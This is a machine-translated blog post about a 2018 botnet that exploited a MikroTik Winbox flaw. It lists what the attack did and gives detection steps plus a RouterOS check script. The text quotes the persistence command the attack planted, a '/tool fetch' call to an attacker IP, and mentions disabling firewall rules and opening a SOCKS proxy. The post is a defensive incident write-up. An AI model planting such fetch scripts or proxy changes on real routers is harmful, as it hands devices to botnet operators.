新的Mikrotik漏洞? 不,但是值得检查您的设备。



8月2日,我收到了MikroTik:紧急安全通报,指出僵尸网络正在使用Winbox Service漏洞来入侵和感染设备。

从新闻通讯的文本中可以明显看出,该漏洞已于2018年4月23日在v6.42.1版本中关闭。 我开始检查赞助商的设备,发现有几台带有6.40.1的路由器,其中一台被感染。

攻击脚本有什么作用?

  • 通过漏洞获取用户列表(即,将admin更改为其他名称不会保存)。
  • 尝试在收到所有登录名的情况下登录,并清除已阻止的登录名。
  • 找到活动的登录名后,获取其密码,然后登录系统。

然后:

  • 禁用防火墙上的所有删除规则。
  • 在非标准端口上启用袜子(IP-袜子),在我的情况下为4145。
  • 在系统-脚本中添加脚本/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no
  • 将脚本运行添加到“系统-计划程序”中。
  • 删除现有脚本(由Mikrotik论坛报告)。

攻击来自iomart Hosting Limited所属的地址95.154.216.151,该地址通过该站点向他们发送了一条消息,但仍未反应,该地址处于活动状态。

地址95.154.216.166也处于活动状态,但是上面没有mikrotik.php文件。

在这里,您可以看到受害者的信息:
www.abuseipdb.com/check/95.154.216.151
www.abuseipdb.com/check/95.154.216.166

如果您的Mikrotik尚未更新,并且Winbox端口对所有人开放,请确保检查设备。

  1. 我们检查IP-防火墙中的删除规则是否处于活动状态。
  2. 我们检查袜子,应断开连接,端口默认为-1080。
  3. 在系统-脚本和系统-计划程序中检查是否有剩余脚本。
  4. 检查miktorik.php文件是否存在
  5. 我们在终端中执行/导出,并用肉眼检查配置。

Mikrotik论坛上的gotsprings用户建议使用此选项:

 :if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"} :if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"} :if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."} :if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."} :if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."} 

打开您的日志并查看结果。 如果结果为“!” 你可能有问题。

显然,让Winbox Service对所有人开放非常不好,但是在某些情况下,请不要忘记更新设备!

相关链接:

forum.mikrotik.com/viewtopic.php?f=21&t=137572
thehackernews.com/2018/08/mikrotik-router-hacking.html

Source: https://habr.com/ru/post/zh-CN419205/


All Articles